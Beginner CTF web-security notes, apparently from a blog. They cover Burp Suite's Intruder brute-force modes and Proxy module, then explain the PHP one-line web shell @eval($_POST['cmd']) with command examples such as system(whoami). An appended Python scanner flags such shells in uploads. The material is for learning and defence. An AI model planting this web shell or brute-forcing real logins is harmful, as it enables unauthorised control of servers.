Web entry notes (1)

CTF web entry notes

1. Use of BP (Burp Suite)

1.1 Introduction to the Intruder module

1.1.1 Positions module

1. The four attack types
(1) Sniper mode
Variables are cracked one at a time, in sequence; if there are multiple variables, each is cracked in turn. (Suitable when only one variable needs to be cracked.)
(2) Battering ram mode
All variables are cracked at the same time: if there are multiple variables, they all receive the payload simultaneously.
(3) Pitchfork mode
Each variable has its own dictionary, and each variable is cracked using the entries of its corresponding dictionary.
(4) Cluster bomb mode
Each variable has its own dictionary and the dictionaries are crossed: the different combinations of entries from the multiple dictionaries are tried. Often used to crack a user name and password when neither is known (but it is also slower).

1.1.2 Payloads module

Load the dictionary needed for cracking (you can import it from your own file, or you can choose the dictionary that BP comes with)

1.1.3 Options module

The setting to highlight here is "Number of threads". To speed up cracking you can increase the number of threads, for example from 5 to 20, but do not simply set it as high as possible (some websites will report errors).

2.1 Introduction to Decoder Module

This is the encoding and decoding conversion module in BP. If something in BP needs to be encoded or decoded, select it, right-click, and send it to the Decoder module for processing (password)

3.1 Proxy module

The Proxy module is the core function of Burp Suite. It acts as a middleman between the client and the server and can intercept, view, and modify data packets.

3.1.1 Intercept module:

You can view and modify the content of HTTP data packets. Data packets can also be sent to other modules.

3.1.2 HTTP history module:

View all data flows and details passing through the proxy server.

3.1.3 WebSockets history module:

Mainly used to record data packets of WebSockets

3.1.4 options module:

Settings for the proxy service, such as the proxy listening port, request interception rules, etc.

2. One-sentence Trojan introduction

2.1 What is a one-sentence Trojan

A one-sentence Trojan is an executable script file. The script file is uploaded to the target server, where it is parsed and executed, which achieves the purpose of controlling the target server.

2.2 Three conditions must be met to upload a Trojan horse successfully

  • The Trojan can be successfully uploaded to the server.
  • We know the path where the Trojan is uploaded to the server.
  • The uploaded Trojan can be parsed and executed.

2.3 phpinfo()

phpinfo() is a statement commonly used with one-sentence Trojans, so it is worth explaining. Its output includes the current PHP compilation options, environment variables, version, server information, etc. (in effect, parts of the PHP configuration). If others can view this output, it leads to information leakage.

2.4 Principle

A piece of PHP code

<?php
// Evaluates the PHP code sent in the POST parameter "cmd"; "@" suppresses error messages
@eval($_POST['cmd']);
?>

Once this code is in the web page, use the POST parameter in the Hackbar plug-in to change the function that is passed in. For example, sending "cmd=phpinfo();" in Hackbar shows the PHP configuration, and "cmd=system(whoami);" shows the user name whose privileges the code runs with.
As for how to get Hackbar for free, a Baidu search solves that quickly (hehehe, funny face)
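
The defensive counterpart to sections 2.2 and 2.4, as an added example that is not part of the original notes: a heuristic Python check that flags uploaded files carrying this kind of one-line code-execution stub. The function name scan_upload, the finding labels and the sample files are constructed for illustration.

```python
import re

# PHP functions that run code or OS commands, and the request superglobals
# that carry client-controlled input.
SINKS = r"eval|assert|system|exec|shell_exec|passthru|popen|proc_open"
SOURCES = r"\$_(?:POST|GET|REQUEST|COOKIE)"
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# A sink call whose arguments reach a request superglobal before the statement
# ends, such as the @eval($_POST['cmd']); line shown in section 2.4.
SINK_ON_INPUT = re.compile(rf"\b({SINKS})\s*\([^;]*?({SOURCES})\s*\[", re.I)
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)
EXEC_EXT = re.compile(r"\.(?:php\d?|phtml|phar)$", re.I)


def scan_upload(filename, content):
    """Return a sorted list of finding labels for one uploaded file."""
    findings = set()
    if EXEC_EXT.search(filename):
        # Condition 3 in section 2.2: the server would parse and execute it.
        findings.add("executable-extension")
    if PHP_TAG.search(content):
        findings.add("php-code-present")
    # Remove /* ... */ comments so they cannot separate the call from its "(".
    code = BLOCK_COMMENT.sub("", content)
    match = SINK_ON_INPUT.search(code)
    if match:
        findings.add(f"{match.group(1).lower()}-on-{match.group(2).upper()}")
    return sorted(findings)


# Constructed sample uploads (not taken from a real system).
SAMPLES = {
    "avatar.png": "PNG placeholder bytes",
    "form.php": "<?php echo htmlspecialchars($_POST['name']); ?>",
    "shell.php": "<?php @eval($_POST['cmd']); ?>",
    "photo.jpg": "GIF89a<?PHP Assert/*x*/( $_REQUEST [ 'a' ] );",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name}: {scan_upload(name, body) or 'clean'}")
```

This is a pattern heuristic only: a file it reports as clean can still be malicious, so it complements, rather than replaces, storing uploads where the server will not parse them as PHP.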

Origin blog.csdn.net/weixin_50998641/article/details/114645399